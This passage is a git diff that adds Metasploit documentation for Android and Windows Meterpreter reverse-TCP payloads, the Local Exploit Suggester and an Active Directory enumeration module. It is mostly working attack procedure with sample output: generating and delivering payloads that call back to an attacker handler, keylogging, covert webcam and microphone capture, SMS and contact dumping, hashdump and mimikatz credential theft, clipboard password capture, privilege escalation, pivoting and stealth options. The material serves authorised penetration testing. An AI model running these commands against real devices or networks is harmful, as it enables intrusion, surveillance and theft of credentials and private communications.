+meterpreter > getuid +Server username: u0_a231 +``` + +**ps** + +The ```ps``` command shows a list of processes the Android device is running. For example: + +``` +meterpreter > ps + +Process List +============ + + PID Name Arch User + --- ---- ---- ---- + 1 /init root + 2 kthreadd root + 3 ksoftirqd/0 root + 7 migration/0 root + 8 rcu_preempt root + 9 rcu_bh root + 10 rcu_sched root + 11 watchdog/0 root + 12 watchdog/1 root + 13 migration/1 root + 14 ksoftirqd/1 root + 17 watchdog/2 root + 18 migration/2 root + 19 ksoftirqd/2 root + 22 watchdog/3 root + 23 migration/3 root + +... +``` + +**shell** + +The ```shell``` command allows you to interact with a shell: + +``` +meterpreter > shell +Process 1 created. +Channel 1 created. +id +uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0 +``` + +To get back to the Meterpreter prompt, you can do: [CTRL]+[Z] + +**sysinfo** + +The ```sysinfo``` command shows you basic information about the Android device. + +``` +meterpreter > sysinfo +Computer : localhost +OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) +Meterpreter : java/android +``` + +**webcam_list** + +The ```webcam_list``` command shows a list of webcams you could use for the ```webcam_snap``` +command. Example: + +``` +meterpreter > webcam_list +1: Back Camera +2: Front Camera +``` + +**webcam_snap** + +The ```webcam_snap``` command takes a picture from the device. You will have to use the +```webcam_list``` command to figure out which camera to use. Example: + +``` +meterpreter > webcam_snap -i 2 +[*] Starting... +[+] Got frame +[*] Stopped +Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg +``` + +**record_mic** + +The ```record_mic``` command records audio. Good for listening to a phone conversation, as well as +other uses. Example: + +``` +meterpreter > record_mic -d 20 +[*] Starting... +[*] Stopped +Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav +``` + +**activity_start** + +The ```activity_start``` command is an execute command by starting an Android activity from a URI +string. + +**check_root** + +The ```check_root``` command detects whether your payload is running as root or not. Example: + +``` +meterpreter > check_root +[*] Device is not rooted +``` + +**dump_calllog** + +The ```dump_calllog``` command retrieves the call log from the Android device. + +**dump_contacts** + +``` +meterpreter > dump_contacts +[*] Fetching 5 contacts into list +[*] Contacts list saved to: contacts_dump_20160308155744.txt +``` + +**geolocate** + +The ```geolocate``` commands allows you to locate the phone by retrieving the current lat-long +using geolocation. + +**wlan_geolocate** + +The ```wlan_geolocation``` command allows you to locate the phone by retrieving the current +lat-long using WLAN information. Example: + +``` +meterpreter > wlan_geolocate +[*] Google indicates the device is within 150 meters of 30.*******,-97.*******. +[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.******* +``` + +**send_sms** + +The ```send_sms``` command allows you to send an SMS message. Keep in mind the phone will keep a +copy of it, too. + +``` +meterpreter > send_sms -d "2674554859" -t "hello" +[+] SMS sent - Transmission successful +``` + +**sms_dump** + +The ```sms_dump``` command allows you to retrieve SMS messages. And save them as a text file. +For example: + +``` +meterpreter > dump_sms +[*] Fetching 4 sms messages +[*] SMS messages saved to: sms_dump_20160308163212.txt + +... + +$ cat sms_dump_20160308163212.txt + +===================== +[+] SMS messages dump +===================== + +Date: 2016-03-08 15:30:12 -0600 +OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) +Remote IP: 192.168.1.207 +Remote Port: 59130 + +#1 +Type : Incoming +Date : 2016-03-08 15:29:32 +Address : ********** +Status : NOT_RECEIVED +Message : Hello world + +... + +``` + +**run** + +The ```run``` command allows you to run a post module against the remote machine at the Meterpreter +prompt. For example: + +``` +meterpreter > run post/android/capture/screen +``` + +## Scenarios + +**Uploading APK to an Emulator using install_msf_apk.sh** + +The Metasploit Framework comes with a script that allows you to automatically upload your APK to +an active emulator and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/). + +To use this, follow these steps: + +1. Start the Android Emulator +2. Generate the Android payload as an APK. +3. In msfconsole, start a handler for android/meterpreter/reverse_tcp +4. Run the installer script like this from a terminal: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk +``` + +The the script will do something like this: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk + adding: META-INF/ANDROIDD.SF + adding: META-INF/ANDROIDD.RSA + signing: classes.dex + signing: AndroidManifest.xml + signing: resources.arsc +Failure +1562 KB/s (10715 bytes in 0.006s) + pkg: /data/local/tmp/android.apk +Success +rm failed for -f, Read-only file system +Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity } +``` + +Back in msfconsole, you should receive a session: + +``` +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] Starting the payload handler... +[*] Sending stage (62432 bytes) to 192.168.1.199 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600 + +meterpreter > +``` + +**Uploading APK to a real Android device using install_msf_apk.sh** + +On the Android device, make sure to enable Developer Options. To do this: + +1. Go to Settings -> About -> Software Information +2. Tap on the Build Number section a couple of times. It should unlock Developer Options. +3. Go back to the Settings page, you should see Developer Options. + +Under Developer Options, make sure to: + +* Enable USB debugging +* Disable Verify apps via USB +* Open a terminal, and type: ```adb devices```. On your Android device, you should see a prompt + asking you to allow the computer for debugging, click OK on that. +* Do: ```adb devices``` again, adb should now have access. + +Run the installer script like this from a terminal: + +``` +$ tools/exploit/install_msf_apk.sh /tmp/android.apk +``` + +And you should get a session. + + + +**Uploading APK from a Web Server** + +One way to upload an APK to Android without adb is by hosting it from a web server. To do this, +you must make sure to allow to trust "Unknown sources". The way to do this varies, but normally +it's something like this: Settings -> Security -> Check "Unknown Sources" + +Once you have that changed, you'll need to: + +1. Generate the APK payload. +2. Start a web server from the directory where the payload is: ```ruby -run -e httpd . -p 8181``` +3. On your Android device, open a browser, and download the APK. +4. You should be able to find the APK from the Downloads folder, install it. +5. After installation, you will have to manually execute it. + +**Reconnect Android Meterpreter from the Browser Remotely** + +When you have the APK payload installed on your Android device, another trick to reconnect it is to +launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed." + +Here's how you do this: + +1. In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job. +2. Do: ```auxiliary/server/android_browsable_msf_launch```. +3. Set the URIPATh if needed. +4. Do: ```run```. At this point, the web server should be up. +5. On your Android device, open the native web browser, and go the URL generated by the auxiliary + module. +6. The Android handler should get a session like the following demo: + +``` +msf > use exploit/multi/handler +msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp +PAYLOAD => android/meterpreter/reverse_tcp +msf exploit(handler) > set LHOST 192.168.1.199 +LHOST => 192.168.1.199 +msf exploit(handler) > set EXITONSESSION false +EXITONSESSION => false +msf exploit(handler) > run -j +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.1.199:4444 +msf exploit(handler) > [*] Starting the payload handler... + +msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch +msf auxiliary(android_browsable_msf_launch) > set URIPATH /test +URIPATH => /test +msf auxiliary(android_browsable_msf_launch) > run + +[*] Using URL: http://0.0.0.0:8080/test +[*] Local IP: http://192.168.1.199:8080/test +[*] Server started. +[*] Sending HTML... +[*] Sending stage (62432 bytes) to 192.168.1.207 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600 +``` diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md new file mode 100644 index 0000000000..0b65ce91bf --- /dev/null +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -0,0 +1,714 @@ +windows/meterpreter/reverse_tcp is one of the most powerful features the Metasploit Framework has +to offer, and there are so many things you can do with it. + +It allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, +control the webcam and microphone, etc. It has the best support for post modules, and you can +load extensions, such as mimikatz and python interpreter, etc. + +windows/meterpreter/reverse_tcp is also the default payload for all Windows exploit targets. + +## Vulnerable Application + +This Meterpreter payload is suitable for the following environments: + +* Windows x64 +* Windows x86 + +## Verification Steps + +windows/meterpreter/reverse_tcp is typically used in two different ways. + +First, it is typically used as a payload for an exploit. Here's how to do that: + +1. In msfconsole, select an exploit module +2. Configure the options for that exploit. +3. Do: ```set payload windows/meterpreter/reverse_tcp``` +4. Set the ```LHOST``` option, which is the IP that the payload should connect to. +5. Do: ```exploit```. If the exploit is successful, it should execute that payload. + +Another way to use windows/meterpreter/reverse_tcp is to generate it as an executable. Normally, +you would want to do it with msfvenom. If you are old school, you have probably also heard of +msfpayload and msfencode. msfvenom is a replacement of those. + +The following is a basic example of using msfvenom to to generate windows/meterpreter/reverse_tcp +as an executable: + +``` +./msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o /tmp/payload.exe +``` + +## Important Basic Commands + +**pwd command** + +The ```pwd``` command allows you to see the current directory you're in on the remote target. +Example: + +``` +meterpreter > pwd +C:\Users\user\Desktop +``` + +**cd command** + +The ```cd``` command allows you to change directories. Example: + +``` +meterpreter > cd C:\\ +meterpreter > pwd +C:\ +``` + +**cat command** + +The ```cat``` command allows you to see the content of a file: + +``` +meterpreter > cat C:\\file.txt +Hello world! +``` + +**upload command** + +The ```upload``` command allows you to upload a file to the remote target. For example: + +``` +meterpreter > upload /tmp/something.txt C:\\Users\\user\\Desktop\\something.txt +[*] uploading : /tmp/something.txt -> C:\Users\user\Desktop\something.txt +[*] uploaded : /tmp/something.txt -> C:\Users\user\Desktop\something.txt +meterpreter > +``` + +The ```-r``` option for the command also allows you to upload recursively. + +**download command** + +The ```download``` command allows you download a file from the remote target to your machine. +For example: + +``` +meterpreter > download C:\\Users\\user\\Desktop\\something.txt /tmp/ +[*] downloading: C:\Users\user\Desktop\something.txt -> /tmp//something.txt +[*] download : C:\Users\user\Desktop\something.txt -> /tmp//something.txt +meterpreter > +``` + +The ```-r``` option for the command also allows you to download recursively. + +**search command** + +The ```search``` command allows you to find files on the remote file system. For example, this +demonstrates how to find all text files in the current directory: + +``` +meterpreter > search -d . -f *.txt +Found 1 result... + .\something.txt (5 bytes) +``` + +Note that without the ```-d``` option, the command will attempt to search in all drives. + +The ```-r``` option for the commands allows you to search recursively. + +**ifconfig command** + +The ```ifconfig``` command displays the network interfaces on the remote machine: + +``` +meterpreter > ifconfig + +Interface 1 +============ +Name : Software Loopback Interface 1 +Hardware MAC : 00:00:00:00:00:00 +MTU : 4294967295 +IPv4 Address : 127.0.0.1 +IPv4 Netmask : 255.0.0.0 +IPv6 Address : ::1 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +... +``` + +The command ```ipconfig``` is an alias for ```ifconfig```. + +**getuid command** + +The ```getuid``` command shows you the current user that the payload is running as: + +``` +meterpreter > getuid +Server username: WIN-6NH0Q8CJQVM\user +``` + +**execute command** + +The ```execute``` command allows you to execute a command or file on the remote machine. + +The following example will spawn a calculator: + +``` +meterpreter > execute -f calc.exe +Process 2076 created. +``` + +To pass an argument, use the ```-a``` flag: + +``` +meterpreter > execute -f iexplore.exe -a http://metasploit.com +Process 2016 created. +``` + +There are some options you can see to add more stealth. For example, you can use the ```-H``` flag +to create the process hidden from view. You can also use the ```-m``` flag to execute from memory. + +**ps command** + +The ```ps``` command lists the running processes on the remote machine. + +**shell command** + +The ```shell``` command allows you to interact with the remote machine's command prompt. Example: + +``` +meterpreter > shell +Process 3576 created. +Channel 6 created. +Microsoft Windows [Version 6.1.7601] +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\user\Desktop> +``` + +To switch back to Meterpreter, do [CTRL]+[Z] to background the channel. + +**sysinfo command** + +The ```sysinfo``` command shows you basic information about the remote machine. Example: + +``` +meterpreter > sysinfo +Computer : WIN-6NH0Q8CJQVM +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +meterpreter > +``` + +**keyscan_start** + +The ```keyscan_start``` command starts the keylogging feature on the remote machine. + +**keyscan_dump** + +The ```keyscan_dump``` command is a keylogger feature. You must use the ```keyscan_start``` command +before using this. Example: + +``` +meterpreter > keyscan_start +Starting the keystroke sniffer... +meterpreter > keyscan_dump +Dumping captured keystrokes... +Hello World!! +``` + +If you wish to stop sniffing, use the ```keyscan_stop``` command. + +**keyscan_stop** + +The ```keyscan_stop``` command stops the keylogger. + +**screenshot** + +The ```screenshot``` command takes a screenshot of the target machine. + +**webcam_list** + +The ```webcam_list``` commands shows you a list of webcams that you can control. You'll +probably want to use this first before using any other webcam commands. + +**webcam_snap** + +The ```webcam_snap``` commands uses the selected webcam to take a picture. + +**webcam_stream** + +The ```webcam_stream``` command basically uses the ```webcam_snap``` command repeatedly to create +the streaming effect. There is no sound. + +**record_mic** + +The ```record_mic``` command captures audio on the remote machine. + +**getsystem** + +The ```getsystem``` command attempts to elevate your privilege on the remote machine with one of +these techniques: + +* Named pipe impersonation (in memory) +* Named pipe impersonation (dropper) +* Token duplication (in memory) + +Example: + +``` +meterpreter > getsystem +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +``` + +**hashdump** + +The ```hashdump``` commands allows you to dump the Windows hashes if there are the right privileges. +For sxample: + +``` +meterpreter > hashdump +Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: +HelpAssistant:1000:92a84e332fa4b09e9850257ad6826566:8fb9a6e155fd6e14a16c37427b68bbb4::: +root:1003:633c097a37b26c0caad3b435b51404ee:f2477a144dff4f216ab81f2ac3e3207d::: +SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:e09fcdea29d93203c925b205640421f2::: +``` + + +## Scenarios + +**Setting up for Testing** + +For testing purposes, if you don't want to manually generate a payload and start a multi handler +repeatedly, you can use the auto_win32_multihandler.rc resource script in Metasploit to automate that process. Here's how you would use it: + +First, run the resource script: + +``` +$ ./msfconsole -q -r scripts/resource/auto_win32_multihandler.rc +[*] Processing scripts/resource/auto_win32_multihandler.rc for ERB directives. +[*] resource (scripts/resource/auto_win32_multihandler.rc)> Ruby Code (776 bytes) +lhost => 192.168.1.199 +lport => 4444 +[*] Writing 73802 bytes to /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe... +[*] windows/meterpreter/reverse_tcp's LHOST=192.168.1.199, LPORT=4444 +[*] windows/meterpreter/reverse_tcp is at /Users/metasploit/.msf4/local/meterpreter_reverse_tcp.exe +payload => windows/meterpreter/reverse_tcp +lhost => 192.168.1.199 +lport => 4444 +exitonsession => false +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] Starting the payload handler... +msf exploit(handler) > +``` + +Next, go to your ~/.msf4/local directory, you should see meterpreter_reverse_tcp.exe in there. +Upload that payload to your test box and execute it. You should receive a connection. + +**Using a Post Module** + +One of the best things about Meterpreter is you have access to a variety of post exploitation +modules, specifically for the multi and Windows categories. Post modules provide you with more capabilities to +collect data from the remote machine automatically. For example, you can steal passwords +from popular applications and enumerate or modify system settings. + +To use a post module from the Meterpreter prompt, simply use the ```run``` command: + +``` +meterpreter > run post/windows/gather/checkvm + +[*] Checking if WIN-6NH0Q8CJQVM is a Virtual Machine ..... +[*] This is a VMware Virtual Machine +meterpreter > +``` + +It is also possible to run a post module via multiple Meterpreter sessions. To learn how, load +the specific post module you wish to run, and enter ```info -d``` to see the basic usage in the +documentation. + + +**Using the Mimikatz Extension** + +[Mimikatz](https://github.com/gentilkiwi/mimikatz) is a well known tool to extract passwords, hashes, PIN code, and kerberos tickets from memory on Windows. This might actually be the first thing you want to use as soon as you get a high-privileged session, such as SYSTEM. + +To begin, load the extension: + +``` +meterpreter > load mimikatz +Loading extension mimikatz...success. +meterpreter > +``` + +This will create more commands for the Meterpreter prompt. Most of them are meant to be used to +retrieve user names, hashes, passwords and other information: + +``` +Mimikatz Commands +================= + + Command Description + ------- ----------- + kerberos Attempt to retrieve kerberos creds + livessp Attempt to retrieve livessp creds + mimikatz_command Run a custom command + msv Attempt to retrieve msv creds (hashes) + ssp Attempt to retrieve ssp creds + tspkg Attempt to retrieve tspkg creds + wdigest Attempt to retrieve wdigest creds +``` + +An example of using the ```msv``` command: + +``` +meterpreter > msv +[+] Running as SYSTEM +[*] Retrieving msv credentials +msv credentials +=============== + +AuthID Package Domain User Password +------ ------- ------ ---- -------- +0;313876 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 } +0;313828 NTLM WIN-6NH0Q8CJQVM user10 lm{ 0363cb92c563245c447eaf70cfac29c1 }, ntlm{ 16597a07ce66307b3e1a5bd1b7abe123 } +0;996 Negotiate WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO) +0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) +0;45518 NTLM n.s. (Credentials KO) +0;999 NTLM WORKGROUP WIN-6NH0Q8CJQVM$ n.s. (Credentials KO) +``` + + +**Using the extapi Extension** + +The main purpose of the extapi extension is to perform advanced enumeration of the target machine. For +example, you can enumerate things like registered services, open windows, clipboard, ADSI, WMI queries, etc. + +To begin, at the Meterpreter prompt, do: + +``` +meterpreter > load extapi +Loading extension extapi...success. +meterpreter > +``` + +One great feature of the extension is clipboard management. The Windows clipboard is interesting +because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected. + +For example, a password manager is a popular tool to store encryped passwords. It allows the user +to create complex passwords without the need to memorize any of them. All the user needs to do is +open the password manager, retrieve the password for a particular account by copying it, and then +paste it on a login page. + +There is a security problem to the above process. When the user copies the password, it is stored +in the operating system's clipboard. As an attacker, you can take advantage of this by starting the +clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies. + +To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data +commnad: + +``` +meterpreter > clipboard_get_data +Text captured at 2016-03-05 19:13:39.0170 +========================================= +hello, world!! +========================================= + +meterpreter > +``` + +The limitation of this command is that since you're only grabbing whatever is in the clipboard at +the time, there is only one item to collect. However, when you start a monitor, you can collect +whatever goes in there. To start, issue the following command: + +``` +meterpreter > clipboard_monitor_start +[+] Clipboard monitor started +meterpreter > +``` + +While it is monitoring, you can ask Meterpreter to dump whatever's been captured. + +``` +meterpreter > clipboard_monitor_dump +Text captured at 2016-03-05 19:18:18.0466 +========================================= +this is fun. +========================================= + +Files captured at 2016-03-05 19:20:07.0525 +========================================== +Remote Path : C:\Users\user\Desktop\cat_pic.png +File size : 37627 bytes +downloading : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png +download : C:\Users\user\Desktop\cat_pic.png -> ./cat_pic.png + +========================================== + +[+] Clipboard monitor dumped +meterpreter > +``` + +The ```clipboard_monitor_stop``` command will also dump the captured data, and then exit. + +Combined with Meterpreter's keylogger, you have a very effective setup to capture the user's +inputs. + + +**Using the Python Extension** + +The Python extension allows you to use the remote machine's Python interpreter. + +To load the extension, at the Meterpreter prompt, do: + +``` +meterpreter > use python +Loading extension python...success. +``` + +The most basic example of using the interpreter is the ```python_execute``` command: + +``` +meterpreter > python_execute "x = 'hello world'; print x" +[+] Content written to stdout: +hello world + +meterpreter > +``` + +Another way to execute Python code is from a local file by using the ```python_import``` command. + +To do this, first prepare for a Python script. This example should create a message.txt on the +remote machine's desktop: + + +```python +import os + +user_profile = os.environ['USERPROFILE'] + +f = open(user_profile + '\\Desktop\\message.txt', 'w+') +f.write('hello world!') +f.close() +``` + +And to run that with the command: + +``` +meterpreter > python_import -f /tmp/test.py +[*] Importing /tmp/test.py ... +[+] Command executed without returning a result +meterpreter > +``` + +To learn more about the Python extension, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/Python-Extension). + +**Network Pivoting** + +There are three mains ways that you can use for moving around inside a network: + + - The route command in the msf prompt + - The route command in the the Meterpreter prompt + - The portfwd command + +***Routing through msfconsole*** + +The route command from the msf prompt allows you connect to hosts on a different network through the compromised machine. You should be able to determine that by looking at the compromised machine's ipconfig: + +``` +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.201:49182) at 2016-03-04 20:35:31 -0600 + +meterpreter > ipconfig +... +Interface 10 +============ +Name : Intel(R) PRO/1000 MT Network Connection +Hardware MAC : 00:0c:29:86:4b:0d +MTU : 1472 +IPv4 Address : 192.168.1.201 +IPv4 Netmask : 255.255.255.0 +IPv6 Address : 2602:30a:2c51:e660::20 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +IPv6 Address : 2602:30a:2c51:e660:44a:576e:3d2c:d765 +IPv6 Netmask : ffff:ffff:ffff:ffff:: +IPv6 Address : 2602:30a:2c51:e660:94be:567f:4fe7:5da7 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +IPv6 Address : fe80::44a:576e:3d2c:d765 +IPv6 Netmask : ffff:ffff:ffff:ffff:: + +... + +Interface 26 +============ +Name : VPN +Hardware MAC : 00:00:00:00:00:00 +MTU : 1400 +IPv4 Address : 192.100.0.100 +IPv4 Netmask : 255.255.255.255 + +... +``` + +The example above shows that we have a Meterpreter connection to 192.168.1.201. Let's call this box A, and it is connected to the 192.100.0.0/24 VPN network. As an attacker, we aren't connected to this network directly, but we can explore that network through box A. + +At the msf prompt, do: + +``` +msf exploit(handler) > route add 192.100.0.0 255.255.255.0 1 +[*] Route added +``` + +The ```1``` at the end of the route indicates the session ID, the payload that is used as a gateway to talk to other machines. + +So right now, we have a connection established to the VPN, and we should be able to connect to another machine from that network: + +``` +msf auxiliary(smb_version) > run + +[*] 192.100.0.101:445 - 192.100.0.101:445 is running Windows 2003 SP2 (build:3790) (name:SINN3R-QIXN9TA2) (domain:WORKGROUP) +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb_version) > +``` + +Another neat trick using route is that you can also bypass the compromised host's firewall this way. For example, if the host has HTTP open, but SMB is blocked by the firewall, you can try to compromise it via HTTP first. You'll need to use the route command to talk to SMB and then try to exploit SMB. + +***Routing through Meterpreter*** + +The route command in Meterpreter allows you change the routing table that is on the target machine. The way it needs to be configured is similar to the route command in msfconsole. + +***Routing through the portfwd command*** + +The portfwd command allows you to talk to a remote service like it's local. For example, if you are able to compromise a host via SMB, but are not able to connect to the remote desktop service, then you can do: + +``` +meterpreter > portfwd add –l 3389 –p 3389 –r > target host > +``` + +And that should allow you to connect to remote desktop this way on the attacker's box: + +``` +rdesktop 127.0.0.1 +``` + +**Meterpreter Paranoid Mode** + +The paranoid mode forces the handler to be strict about which Meterpreter should be connecting to it, hence the name "paranoid mode". + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode). + +**Meterpreter Reliable Network Communication** + +Exiting Metasploit using ```exit -y``` no longer terminates the payload session like it used to. Instead, it will continue to run behind the scenes, attempting to connect back to Metasploit when an appropriate handler is available. If you wish to exit the session, make sure to ```sessions -K``` first. + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Reliable-Network-Communication). + +**Meterpreter Sleep Control** + +The sleep mode allows the payload on the target machine to be quiet for awhile, mainly in order to avoid suspicious active communication. It also provides better efficiency. + +It is very simple to use. At the Meterpreter prompt, simply do: + +``` +meterpreter > sleep 20 +``` + +And that will allow Meterpreter to sleep 20 seconds, and will reconnect. + +To learn more about this feature, please [click here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Sleep-Control). + +**Meterpreter Stageless Mode** + +A stageless Meterpreter allows a more economical way to deliver the payload, for cases where a normal one would actually cost too much time and bandwidth in a penetration test. To learn more about this, [click on this](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode) to read more. + +To use the stageless payload, use ```windows/meterpreter_reverse_tcp``` instead. + +**Meterpreter Timeout Control** + +The timeout control basically defines the life span of Meterpreter. To configure it, use the +```set_timeouts``` command: + +``` +meterpreter > set_timeouts +Usage: set_timeouts [options] + +Set the current timeout options. +Any or all of these can be set at once. + +OPTIONS: + + -c Comms timeout (seconds) + -h Help menu + -t Retry total time (seconds) + -w Retry wait time (seconds) + -x Expiration timout (seconds) +``` + +To see the current timeout configuration, you can use the ```get_timeouts``` command: + +``` +meterpreter > get_timeouts +Session Expiry : @ 2016-03-11 21:15:58 +Comm Timeout : 300 seconds +Retry Total Time: 3600 seconds +Retry Wait Time : 10 seconds +``` + +To learn more about timeout control, please [go here](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Timeout-Control). + +**Meterpreter Transport Control** + +Transport Control allows you manage transports on the fly while the payload session is still running. Meterpreter can automatically cycle through the transports when communication fails, or you can do it manually. + +To learn more about this, please read this [documentation](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control). + +## Using the Post Exploitation API in IRB + +To enter IRB, do the following at the Meterpreter prompt: + +``` +meterpreter > irb +[*] Starting IRB shell +[*] The 'client' variable holds the meterpreter client + +>> +``` + +**The client object** + +The client object in Meterpreter's IRB allows you control or retrieve information about the host. For example, this demonstrates how to obtain the current privilege we're running the payload as: + +```ruby +>> client.sys.config.getuid +``` + +To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it: + +``` +>> client.inspect +``` + +You can use the #methods method to see what methods you can use: + +``` +>> client.methods +``` + +To find the source of the method, you can use the #source_location method. For example, say I want to find the source code for the #getuid method: + +``` +>> client.sys.config.method(:getuid).source_location +=> ["/Users/user/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32] +``` + +The first element of the array is the location of the file. The second element is the line number of the method. + +**Using Railgun** + +Railgun allows you to use the remote machine's Windows API in Ruby. For example, to create a MessageBox on the target machine, do: + +``` +>> client.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK") +=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1} +``` + +To learn more about using Railgun, please read this [wiki](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation). + diff --git a/documentation/modules/post/multi/recon/local_exploit_suggester.md b/documentation/modules/post/multi/recon/local_exploit_suggester.md new file mode 100644 index 0000000000..89d54765bb --- /dev/null +++ b/documentation/modules/post/multi/recon/local_exploit_suggester.md @@ -0,0 +1,31 @@ +The Local Exploit Suggester is a post-exploitation module that you can use to check a system for local vulnerabilities. It performs local exploit checks; it does not actually run any exploits, which is useful because this means you to scan a system without being intrusive. In addition to being stealthy, it's a time saver. You don't have to manually search for local exploits that will work; it'll show you which exploits the target is vulnerable to based on the system's platform and architecture. + +The Local Exploit Suggester is available for Python, PHP, and Windows Meterpreter. + + +## Vulnerable Application + +To use the Local Exploit Suggester: + +* You must have an open Meterpreter session. + +## Verification Steps + +Please see the Overview section. + +##Options + +You can set the following options for the Local Exploit Suggester: + +* **showdescription** - Set this option to true to see more details about each exploit. + + +## Scenarios + +When the Local Exploit Suggester runs, it displays a list of local exploits that the target may be vulnerable to, and it tells you the likelihood of exploitation. + +The following terms are used to help you understand how vulnerable a target is to a particular exploit: + +* **Vulnerable** - Indicates that the target is vulnerable. +* **Appears** - Indicates that the target may be vulnerable based on the file version, but the vulnerable code has not been tested. +* **Detected** - Indicates that the target has the file, but it cannot be determined whether or not the target is vulnerable. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/ad_to_sqlite.md b/documentation/modules/post/windows/gather/ad_to_sqlite.md new file mode 100644 index 0000000000..e6c0321023 --- /dev/null +++ b/documentation/modules/post/windows/gather/ad_to_sqlite.md @@ -0,0 +1,521 @@ +This is a post exploitation module which has the effect of copying the AD groups, user membership +(taking into account nested groups), user information and computers to a local SQLite database. +This is particularly useful for red teaming and simulated attack engagements because it offers +the ability to gain situational awareness of the target's domain completely offline. Examples of +queries that can be run locally include: + +* Identification of members in a particular group (e.g. 'Domain Admins'), taking into account + members of nested groups. +* Organizational hierarchy information (if the manager LDAP attribute is used). +* Ability to determine group membership and user membership (e.g. 'What groups are these users a + member of?', 'What users are members of these groups?', 'List all members who are effectively + members of the Domain Admins group who are not disabled' etc) +* Expansion of the userAccountControl and sAMAccountType variables for querying ease. +* Generation of a list of DNS hostnames, computer names, operating system versions etc of each + domain joined computer. +* Identification of security groups that have managers. +* Exporting anything above in different formats, including those which can be imported into + other tools. + +## Mechanism + +This module makes heavy usage of ADSI and performs the following basic steps: + +**User and group acquisition** + +* Perform an ADSI query to list all active directory groups and store them in the local ad_groups + table (parsing attributes which contain flags). +* Loop through them and, for each group, launch another LDAP query to list the effective members of + the group (using the LDAP_MATCHING_RULE_IN_CHAIN OID). The effect is that it will reveal all + effective members of that group, even if they are not direct members of the group. +* For each user, perform another query to obtain user specific attributes and insert them into the + local ad_users table. +* Insert a new row into the ad_mapping table associating the user RID with the group RID. + +**Computer acquisition** + +* Perform an ADSI query to list all computers in the domain. +* Parse any attributes containing flags (userAccountControl, sAMAccountType) and insert them into + the local ad_computers table. + +## Module Specific Options + +Option | Purpose +--------------- | -------- +GROUP_FILTER | Additional LDAP filters to apply when building the initial list of groups. +SHOW_COMPUTERS | If set to TRUE, this will write a line-by-line list of computers, in the format: ```Computer [Name][DNS][RID]``` to the console. For example: ```Computer [W2K8DC][W2K8DC.goat.stu][1000]``` +SHOW_USERGROUPS | If set to TRUE, this will write a line-by-line list of user to group memberships, in the format: ```Group [Group Name][Group RID] has member [Username][User RID]```. For example: ```Group [Domain Users][513] has member [it.director][1132]```. This can be used mainly for progress, but it may be simpler to cat and grep for basic queries. However, the real power of this module comes from the ability to rapidly 